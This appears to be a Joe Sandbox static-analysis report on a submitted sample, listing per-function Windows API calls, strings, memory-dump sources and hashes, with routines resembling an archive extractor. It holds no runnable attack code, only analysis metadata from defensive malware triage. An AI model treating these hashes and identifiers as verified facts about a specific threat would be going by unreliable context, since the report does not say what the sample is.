Function 00FBC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FBC2B1
EndDialog.USER32(?,00000006), ref: 00FBC2C4
GetDlgItem.USER32(?,0000006C), ref: 00FBC2E0
SetFocus.USER32(00000000), ref: 00FBC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00FBC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FBC358
FindFirstFileW.KERNEL32(?,?), ref: 00FBC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FBC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FBC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FBC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FBC3D4
_swprintf.LIBCMT ref: 00FBC404

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FBC417
FindClose.KERNEL32(00000000), ref: 00FBC41E
_swprintf.LIBCMT ref: 00FBC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00FBC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FBC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FBC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FBC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FBC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FBC509
_swprintf.LIBCMT ref: 00FBC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FBC548
_swprintf.LIBCMT ref: 00FBC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00FBC5AF

Part of subcall function 00FBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FBAF35
Part of subcall function 00FBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00FDE72C,?,?), ref: 00FBAF84

Strings

REPLACEFILEDLG, xrefs: 00FBC247
%s %s %s, xrefs: 00FBC3F2, 00FBC527
%s %s, xrefs: 00FBC469, 00FBC58E

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 86bfc2592debaedda42f5ed4e67afffb37e05fb2e7e981a7f215ac5966496343
Instruction ID: f4c4442e130af8b7cb4fe813031a6886e9bd79a4861b7309068e9f12e02b62b6
Opcode Fuzzy Hash: 86bfc2592debaedda42f5ed4e67afffb37e05fb2e7e981a7f215ac5966496343
Instruction Fuzzy Hash: 7B9184B2648349BFD231DBA1CC49FFB77ACEB4A700F044819F785D6181D775A604AB62

Function 00FA6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA6FAA
_wcslen.LIBCMT ref: 00FA7013
_wcslen.LIBCMT ref: 00FA7084

Part of subcall function 00FA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FA7AAB
Part of subcall function 00FA7A9C: GetLastError.KERNEL32 ref: 00FA7AF1
Part of subcall function 00FA7A9C: CloseHandle.KERNEL32(?), ref: 00FA7B00

Part of subcall function 00FAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641,000000FF), ref: 00FAA1F1
Part of subcall function 00FAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641), ref: 00FAA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00FA7139
CloseHandle.KERNEL32(00000000), ref: 00FA7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FA7298

Part of subcall function 00FA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FA73BC,?,?,?,00000000), ref: 00FA9DBC
Part of subcall function 00FA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00FA9E70

Part of subcall function 00FA9620: CloseHandle.KERNELBASE(000000FF,?,?,00FA95D6,?,?,?,?,?,00FD2641,000000FF), ref: 00FA963B

Part of subcall function 00FAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA501
Part of subcall function 00FAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA532

Strings

UNC\, xrefs: 00FA7051
SeCreateSymbolicLinkPrivilege, xrefs: 00FA6FCC
SeRestorePrivilege, xrefs: 00FA6FC2
\??\, xrefs: 00FA702B

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 997448f6171a7ad2d693f779048789fdfbe44a3cdd1f02b39b1462b89f878912
Instruction ID: cf102abe102e8d07b09b7da065bcf1382d5939f99557f789e73aeaf2b0c607de
Opcode Fuzzy Hash: 997448f6171a7ad2d693f779048789fdfbe44a3cdd1f02b39b1462b89f878912
Instruction Fuzzy Hash: 0AC1E8B1D04745AEDB21EB74CC41FEEB7ACAF05310F04455AFA56E3282D734AA44EB61

Function 00FCD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00FCDA34

Strings

1#QNAN, xrefs: 00FCEC3A
1#IND, xrefs: 00FCEC2C
1#SNAN, xrefs: 00FCEC33
1#INF, xrefs: 00FCEC41

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 9a453da398600c64f85008d511bea559c112db14106670afb90aa222df136819
Instruction ID: 4e2e0e5c846bd9fa466af3dc491ebe43813e004875e7ccb06efbbbf98dcd726b
Opcode Fuzzy Hash: 9a453da398600c64f85008d511bea559c112db14106670afb90aa222df136819
Instruction Fuzzy Hash: 23C25F72E0462A8FDB25CE28DE41BE9B7B5EB44314F1441EED44EE7240E779AE819F40

Function 00FA32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA3300
_swprintf.LIBCMT ref: 00FA36C7

Strings

CMT, xrefs: 00FA3A17
h%u, xrefs: 00FA36BC
hc%u, xrefs: 00FA370A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: eba983ce0b4af1b837ea25cb1dacb1295bea2f6bde0fa4642027b73bfb1aa6a7
Instruction ID: 3f443c7a2abafed3332f5721a363efe89933bd0a4a386982d1ca9d2862dfbc08
Opcode Fuzzy Hash: eba983ce0b4af1b837ea25cb1dacb1295bea2f6bde0fa4642027b73bfb1aa6a7
Instruction Fuzzy Hash: 4132E6B15103849FDF14DF74C895AE93BA5AF56300F08447DFD8A8B283DB74AA49DB60

Function 00FA286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA2874
_strlen.LIBCMT ref: 00FA2E3F

Part of subcall function 00FB02BA: __EH_prolog.LIBCMT ref: 00FB02BF

Part of subcall function 00FB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FABAE9,00000000,?,?,?,00010416), ref: 00FB1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA2F91

Strings

CMT, xrefs: 00FA2FBC

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 46c42aceb7c5740681e7c8a77566c3bd64c9b1ebb51cde5ef85f24de9bfc3d63
Instruction ID: 0485251e30367ae7caebdb08188ae1e1050db583a489d04c578efcd6ff0bf32e
Opcode Fuzzy Hash: 46c42aceb7c5740681e7c8a77566c3bd64c9b1ebb51cde5ef85f24de9bfc3d63
Instruction Fuzzy Hash: 7E621AB1A002458FDB19DF38C8857EA37A1FF56310F08457EFC9A8B282DB759945EB60

Function 00FBF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FBF844
IsDebuggerPresent.KERNEL32 ref: 00FBF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FBF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00FBF93A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bf3103d3e05579b3202af06d9e51ce7746da50f1779635dbe9282bffa0f8d242
Instruction ID: 6c829a429deeb7de68d753331982b75dc5259e8daef6d8ac27ada2a34fac2d2a
Opcode Fuzzy Hash: bf3103d3e05579b3202af06d9e51ce7746da50f1779635dbe9282bffa0f8d242
Instruction Fuzzy Hash: B1312975D0631D9BDB20DFA5DD897CCBBB8AF08304F1041AAE50CAB250EB759B889F45

Function 00FBE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00FBE5E8,0000001C,00FBE7DD,00000000,?,?,?,?,?,?,?,00FBE5E8,00000004,01001CEC,00FBE86D), ref: 00FBE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00FBE5E8,00000004,01001CEC,00FBE86D), ref: 00FBE6CF

Strings

D, xrefs: 00FBE6C3

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 9c6c50e3f67f606d5c8f71dc5ad18005b54843526a0e6e6e6bbe861fe59f3f74
Instruction ID: dab495ed5fceb39b7647391129ae723b12f24855949989f9f0888b53b3ae99ed
Opcode Fuzzy Hash: 9c6c50e3f67f606d5c8f71dc5ad18005b54843526a0e6e6e6bbe861fe59f3f74
Instruction Fuzzy Hash: F701F732A001096BDB14DE29DC09BDD7BAAAFC4334F1CC121ED19D7251DA38D9059A80

Function 00FC8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FC8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FC8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00FC8FCC

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 38dfa5a8aef8a7a6242896d38bfe82ea42fb63fd8cbd79332fcf3cec4afeba02
Instruction ID: 2b8ad2dca884aa17c26430788bcdcf66bd76386de9aad14b5de68b47dd39dbed
Opcode Fuzzy Hash: 38dfa5a8aef8a7a6242896d38bfe82ea42fb63fd8cbd79332fcf3cec4afeba02
Instruction Fuzzy Hash: 8B31E474D0121DABCB21DF24DD89BDCBBB8AF08310F5041EAE41CA6250EB349F859F44

Function 00FCD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 584b84fae4b5128d84fe8e58136bb7f277403880bac88e1021b8182fd563e92e
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 05021C71E0021A9BDF14CFA9C981BADB7F1EF88324F25816ED919E7384D731A941DB90

Function 00FBAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FBAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00FDE72C,?,?), ref: 00FBAF84

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 99d269863975d8760eb509da7e7a372dcb66f6caa9f33e22dac6ca3c6dcf13d0
Instruction ID: e0e14df3e6fe99fdf833b9a2288d8973a89591e390098f5ec3249a283c642abd
Opcode Fuzzy Hash: 99d269863975d8760eb509da7e7a372dcb66f6caa9f33e22dac6ca3c6dcf13d0
Instruction Fuzzy Hash: 6B015E7A50031DAAD7109F75DC45FAA77BDEF08710F404022FB1597261D370AA18DBA5

Function 00FA6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00FA6DDF,00000000,00000400), ref: 00FA6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FA6C95

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 3dd90f91a34956409c3e88e164a1069e2039bd593607911e365ac2338e2cf530
Instruction ID: ce6cabacb732250c41d01f7d98fcb2ea7b8b003df07acedfca8d63bd13f350ca
Opcode Fuzzy Hash: 3dd90f91a34956409c3e88e164a1069e2039bd593607911e365ac2338e2cf530
Instruction Fuzzy Hash: B5D0C971345300BFFA110B719D0AF2A7B9ABF56B66F18C405B795E80E0DA749424B62A

Function 00FD19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FD19EF,?,?,00000008,?,?,00FD168F,00000000), ref: 00FD1C21

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6ae20e9edb5483f9f57b39235b71119b4734ab6186b5e7d0e34982239363b197
Instruction ID: 70a0f8d88d7e17041626ad0db698a1e8ab3c11c774cc18e091ce99ad29d7c937
Opcode Fuzzy Hash: 6ae20e9edb5483f9f57b39235b71119b4734ab6186b5e7d0e34982239363b197
Instruction Fuzzy Hash: B8B16032620608EFD715CF28C486BA57BE2FF45364F29865AE899CF3A1C335D991DB40

Function 00FBF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FBF66A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 6b79e073726bfd601aa2f4a057335da09d631793eb40dd7c7a0f873c0420156c
Instruction ID: 963d729ad1dc9ebad94e4e004137a80387d56cbcae0fad3af7b4e6364236641a
Opcode Fuzzy Hash: 6b79e073726bfd601aa2f4a057335da09d631793eb40dd7c7a0f873c0420156c
Instruction Fuzzy Hash: 33519DB1E016098FEB25DFA5EC817AABBF0FB48314F24846AD415EB240D375D904DF50

Function 00FAB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00FAB16B

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: e195cd755ff7d6eebd17a80b6838d439b6932661ff7ae18825504bd67887ff75
Instruction ID: b35cac694d548a257652c96342e1dbf1d5f914c91dfd58dfed76ffbcd675b37f
Opcode Fuzzy Hash: e195cd755ff7d6eebd17a80b6838d439b6932661ff7ae18825504bd67887ff75
Instruction Fuzzy Hash: 34F03AB5E0024C8FDB18DB28EC966D977F2FB89319F10439AD61597390C3B0A9C0EE61

Function 00FA40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 00FA41BC

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: bf771e1a2cc854396307a19f189975544b79212e320b03c59cc86949dabaeede
Instruction ID: 6ee16849bdb9085879731b3f38719e77fa2e99a4d7f1be191b1454352514ab2e
Opcode Fuzzy Hash: bf771e1a2cc854396307a19f189975544b79212e320b03c59cc86949dabaeede
